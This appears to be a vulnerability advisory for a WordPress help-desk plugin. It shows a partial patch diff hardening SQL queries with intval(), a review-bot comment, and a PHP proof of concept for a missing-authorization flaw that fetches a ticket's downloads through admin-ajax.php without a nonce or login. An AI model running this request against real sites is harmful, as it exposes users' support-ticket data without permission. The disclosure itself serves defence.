             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -577,7 +577,7 @@
         //$jsst_childNew = wp_json_encode( stripslashes_deep($jsst_childNew) );
         $jsst_childNew = wp_json_encode( $jsst_childNew  );
         $jsst_child->userfieldparams = $jsst_childNew;
-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET userfieldparams = '" . esc_sql($jsst_childNew) . "' WHERE id = " . esc_sql($jsst_child->id);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET userfieldparams = '" . esc_sql($jsst_childNew) . "' WHERE id = " . intval($jsst_child->id);
         jssupportticket::$_db->query($jsst_query);
         if (jssupportticket::$_db->last_error != null) {

@@ -597,14 +597,14 @@
         if(!is_numeric($jsst_fieldfor)) return false;
         $jsst_wherequery = '';
         if(isset($jsst_parentfield) && $jsst_parentfield !='' ){
-            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
+            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
             $jsst_parent = jssupportticket::$_db->get_var($jsst_query);
-            $jsst_wherequery = ' OR id = '.esc_sql($jsst_parent);
+            $jsst_wherequery = ' OR id = '.intval($jsst_parent);
         }
-        $jsst_query = "SELECT fieldtitle AS text ,id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND multiformid = ".intval($jsst_formid)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo' OR userfieldtype = 'depandant_field') AND (depandant_field = '' ".esc_sql($jsst_wherequery)." ) ";
+        $jsst_query = "SELECT fieldtitle AS text ,id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND multiformid = ".intval($jsst_formid)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo' OR userfieldtype = 'depandant_field') AND (depandant_field = '' ".esc_sql($jsst_wherequery)." ) ";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         if(isset($jsst_parentfield) && $jsst_parentfield !='' ){
-            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
+            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND (userfieldtype = 'radio' OR userfieldtype = 'combo'OR userfieldtype = 'depandant_field') AND depandant_field = '" . esc_sql($jsst_parentfield) . "' ";
             $jsst_parent = jssupportticket::$_db->get_var($jsst_query);
         }
         $jsst_nonce = wp_create_nonce("get-section-to-fill-values-".$jsst_fieldfor);
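Review bot: the main `SELECT` in this hunk wraps `$jsst_wherequery` in `esc_sql()`, but that variable is a SQL fragment (`' OR id = '.intval($jsst_parent)`) rather than a value; escaping a fragment is a no-op here and obscures what is being concatenated. Since the fragment is now built from `intval()`, concatenate it directly and drop the `esc_sql()` call. Also, `get_var()` can return `null`, which `intval()` turns into `OR id = 0`; harmless, but an explicit `if ($jsst_parent)` as used in the next function would be clearer.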
@@ -619,15 +619,15 @@
         if(!is_numeric($jsst_fieldfor)) return false;
         $jsst_wherequery = '';
         if(isset($jsst_field) && $jsst_field !='' ){
-            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".esc_sql($jsst_fieldfor)." AND (userfieldtype IN ( 'combo', 'text', 'checkbox', 'date', 'email', 'radio', 'multiple') ) AND visible_field = '" . esc_sql($jsst_field) . "' ";
+            $jsst_query = "SELECT id FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE fieldfor = ".intval($jsst_fieldfor)." AND (userfieldtype IN ( 'combo', 'text', 'checkbox', 'date', 'email', 'radio', 'multiple') ) AND visible_field = '" . esc_sql($jsst_field) . "' ";
             $jsst_parent = jssupportticket::$_db->get_var($jsst_query);
             if ($jsst_parent) {
-                $jsst_wherequery = ' OR id = '.esc_sql($jsst_parent);
+                $jsst_wherequery = ' OR id = '.intval($jsst_parent);
             }
         }
         $jsst_wherequeryforedit = '';
         if(isset($jsst_cid) && $jsst_cid !='' ){
-            $jsst_wherequeryforedit = ' AND id != '.esc_sql($jsst_cid);
+            $jsst_wherequeryforedit = ' AND id != '.intval($jsst_cid);
         }

         // Base fields always included
@@ -646,14 +646,14 @@
         SELECT fieldtitle AS text, field AS id
             FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering
             WHERE (
-                fieldfor = " . esc_sql($jsst_fieldfor) . "
-                AND multiformid = '" . esc_sql($jss

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-48887 - JS Help Desk – AI-Powered Support & Ticketing System Missing Authorization

$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$ticket_id  = 1;                    // Change this to the target ticket ID

// The request is sent with no cookie and no nonce: the handler is reachable
// through the public admin-ajax.php endpoint, which is what this PoC checks.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, rtrim($target_url, '/') . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action'     => 'getAllDownloads',
    'downloadid' => $ticket_id,
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);

$response = curl_exec($ch);
if ($response === false) {
    fwrite(STDERR, 'Request failed: ' . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
$status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
curl_close($ch);

// WordPress replies with a bare "0" when the action has no registered
// handler; any other body means the plugin's handler ran for this ticket ID.
echo "Response for ticket ID $ticket_id (HTTP $status):\n";
echo $response, "\n";
